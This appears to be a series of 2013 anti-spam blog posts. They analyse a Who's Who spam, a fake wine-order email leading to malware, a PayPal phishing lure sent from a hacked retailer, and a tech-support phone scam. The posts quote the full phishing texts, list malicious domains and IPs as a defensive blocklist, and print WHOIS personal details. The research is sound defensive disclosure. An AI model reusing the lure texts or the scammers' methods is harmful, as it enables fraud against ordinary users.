Please remember: Inclusion of your biography in the Who's Who Registry carries neither cost nor commitment to you of any sort. Our continuing mission with each new edition is to prepare a biographies spanning the spectrum of noteworthy and accomplished men and women across all areas of the professional world.

                                             FILL OUT FORM HERE

Who's Who Network Online
2280 Grand Avenue, Baldwin, NY 11510

------------------------------------------

This email is intended only for the recipient(s) and is private.
If you receive our invitation in error please reply with unsubscribe in the subject line

Clicking on the link takes you to whoswhonetworkonline.com hosted on 66.11.129.87 (Stafford Associates Computer Specialists Inc., New York). The WHOIS details are hidden.

There's no clue anywhere on the site or in the email about who is behind the spam. There is no corporation in New York with the exact name "Who's Who Network Online" although there are several similar sounding entities.

However, there are some clues in the headers of the email that link it through to another recent and similarly-themed spam.

Received: from cpm2@contactwhoswho.us by [redacted] by uid 1002 with qmail-scanner-1.22
 ( Clear:RC:0(192.217.104.157):.
 Processed in 0.464627 secs); 19 Jul 2013 04:45:09 -0000
Received: from unknown (HELO whowho4.servername.com) (192.217.104.157)
  by [redacted] with SMTP; 19 Jul 2013 04:45:08 -0000
Received: from c-174-58-75-1.hsd1.fl.comcast.net ([174.58.75.1]:58694 helo=susie-HP.hsd1.fl.comcast.net.)
    by whowho4.servername.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
    (Exim 4.80.1)
    (envelope-from )
    id 1V02Z1-0000pJ-QW
    for [redacted]; Fri, 19 Jul 2013 08:45:08 +0400
Content-Type: multipart/alternative; boundary="===============0491393293=="


The email originates from a Comcast IP address of 174.58.75.1 in West Florida, and then routes through a server at 192.217.104.157 (NTT America) which has the hostname contactwhoswho.us which is consistent with the cpm2@contactwhoswho.us sender's address. So, who is contactwhoswho.us?

Registrant Name:                Darin Delia
Registrant Address1:            1321 Henry Ave
Registrant City:                Spring Hill
Registrant State/Province:      Florida
Registrant Postal Code:         34608
Registrant Country:             United States
Registrant Country Code:        US
Registrant Phone Number:        +1.5615964330
Registrant Email:               darindelia@gmail.com
Registrant Application Purpose: P1
Registrant Nexus Category:      C11


Darin Delia's address is also West Florida (although some way from the theoretical location of the IP address). Darin Delia appears to be the same person who was sending out Spotlite Radio spam. Is Mr Delia merely a contractor sending out an email blast, or is he responsible for this so-called "Who's Who" outfit. I have no evidence one way or the other, but it seems he does have some sort of association with whoever is running these things..

Thursday, 18 July 2013

K&L Wine Merchants (KLWines.com) spam / prysmm.net

This fake K&L Wine Merchantsm spam email leads to malware on www.klwines.com.order.complete.prysmm.net:


Date:      Thu, 18 Jul 2013 05:57:28 -0800
From:      drowsedl04@inbound.ups.net
CC:     
Subject:      Your K&L order #56920789 is complete

Hello from K&L Wine Merchants -- www.KLWines.com

Just wanted to let you know that your order (#56920789) is complete.

Additional comments for this order: Ship Fri. 7/19

The following items are included in this order:

------------------------------------------------------------------
 Item                               Price Shipped    Subtotal
------------------------------------------------------------------

 2009 Whitehall Lane Napa          $32.99     1        $32.99
     Valley Cabernet Sauvignon

 2007 Friggiali Brunello di        $28.99     2        $57.98
     Montalcino

 2010 Columbia Crest "H3"          $10.99     2        $21.98
     Horse Heaven Hills Washington
     Cabernet Sauvignon

 2010 Seven Hills Columbia         $19.99     1        $19.99
     Valley Cabernet Sauvignon

 2010 Bonaccorsi "Fiddlestix       $44.99     1        $44.99
     Vineyard" Sta. Rita Hills
     Pinot Noir

 2010 Melville "Estate" Santa      $25.99     1        $25.99
     Rita Hills Pinot Noir

 2007 La Fortuna Brunello di       $38.99     1        $38.99
     Montalcino

------------------------------------------------------------------
                Item Subtotal:    $247.91
                          Tax:      $0.00
          Shipping & Handling:     $67.18
                        Total:    $315.09

The shipping method for this order is UPS 2-Day, being sent to:

        Matthew Wright
        4025 sunset city plaza
        garden city, DC 13375 USA
      

The tracking number for this shipment is 1Z474482A140261050.
Please visit the freight carrier's site for exact shipping pickup and dropoff dates, by clicking on the link below. You may have to copy the link and paste it into your browser.
http://wwwapps.ups.com/etracking/tracking.cgi?TypeOfInquiryNumber=T&InquiryNumber1=1Z474482A140261050

To see the latest information about your order, visit "My Account" at http://www.klwines.com/account.asp. "My Account" lets you manage your orders online by giving you the ability to do the following:

* See your order status
* Change your e-mail address or password
* Update your billing and shipping information for future orders

You can also reach "My Account" by clicking on the link on the top of any page on our Web site.

If you need to get in touch with us about your orders, contact us via Contacts page.

Thank you for shopping at klwines.com -- we appreciate your business.

---------------------------------------------------------------------
K&L Wine Merchants
"Internet's Best Wine Site"  -- Money Magazine
questions@klwines.com             http://www.klwines.com/
---------------------------------------------------------------------

The link in the email goes through a legitimate hacked site and ends up on a malware page at [donotclick]www.klwines.com.order.complete.prysmm.net/news/order-information.php (report here) hosted on:


50.97.253.162 (Softlayer, US)
59.126.142.186 (Chungwa Telecom, Taiwan)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)

The fake WHOIS details mark this out as belonging to the Amerika gang.

   Matamoros, Grace  freehotjob@yahoo.com
   6805 Laredo
   Houston, TX 77020
   US
   8322897755

Recommended blocklist:
50.97.253.162
59.126.142.186
203.236.232.42
209.222.67.251
autorize.net.models-and-kits.net
clik-kids.com
condalnua745746.ru
cpa.state.tx.us.tax-returns.mattwaltererie.net
ehnihenransivuennd.net
epackage.ups.com.shanghaiherald.net
erawppa.com
ermitirationifyouwau30.net
estateandpropertty.com
firerice.com
fulty.net
gebelikokulu.net
generationpasswaua40.net
gondamtvibnejnepl.net
greenleaf-investment.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
klwines.com.order.complete.prysmm.net
linkedin.com-update-report.taltondark.net
m.krasalco.com
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
microsoftnotification.net
motobrio.net
mycanoweb.com
pass-hc.com
prysmm.net
quipbox.com
sendkick.com
taltondark.net
tax-returns.gov.cpa.state.us.gebelikokulu.net
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
viperlair.net
vitans.net

primrose.co.uk hacked, email addresses compromised

Garden accessory primrose.co.uk has been hacked, and email addresses stored in their system are being abused for phishing purposes:

From:     paypal.co.uk [service@paypal.co.uk]
Date:     18 July 2013 11:01
Subject:     We cannot process your payment at this time.

   
Dear,

We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?

It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.

Reference Number: PP-001-278-254-803

It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.

1.
    Download the attached document and open it in a browser window secure.
2.
    Confirm that you are the account holder and follow the instructions.

Yours sincerely,
PayPal
   

Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589

The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com  (62.149.142.113 - Aruba, Italy) and submitting the data to www.paypserv.com (62.149.142.152 - also Aruba). The WHOIS details are no doubt fake are are respectively:

Saunders, John Alan  mahibarayanlol@gmail.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455

----------

Clarke, Victoria  johanjo1010@gmail.com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064


Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything.

Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.

Wednesday, 17 July 2013

02086 547426 "PC Wizard" tech support scam

Just a quick one.. some Indian scammers routing through a UK number 02086 547426 (02086547426) and purporting to be from a company "PC Wizard" just called and tried to convince me that something was wrong with my PC.

I'll do a write up later.. but in the mean time their MO is to get you to look at your Event Viewer for errors (there are always) errors, and then visit ammyy.com to run some remote control software. DO NOT LET THEM DO THIS!

Update:
I know this type of scam is quite common, and ammyy.com even admits that it is often abused in this way. There was a degree of sophistication here though in that they had a close approximation of my wife's name and we have an unlisted telephone number.

There were two operatives, the first one handles the initial part of the call and makes you open up your Event Viewer to look for errors and warnings (there are always some of those) and then warns you not to open the warnings or you will damage the computer. Operative number one had an Indian accent and sounded like they were coming in over a voice-over-IP connection.

Once they have you hooked, you get connected to a second Indian operator who attempts to connect to your computer with the ammyy.com remote control software. In this case it was operator 6070592.

After mucking the operator around for 20 minutes I confronted them with what they were doing. He was unapologetic and full of bullshit, and was still trying to connect to my machine.

Of course, the whole thing is a scam. I don't have a support contract for my version of Windows, the errors in my Event Viewer were harmless.. but if I had let the operator take control of my machine then he could have installed any sort of malware on it, or trashed the machine and then charge me a fortune to fix it.

I've been working in the IT field for almost 25 years and frankly it was obvious in the first few seconds that this was a scam. But for a naive user it might seem credible. If (like me) you end up doing tech support for your relatives, it might be a good idea to edit the PC's hosts file to block ammyy.com and www.ammyy.com:

0.0.0.0     ammyy.com
0.0.0.0     www.ammyy.com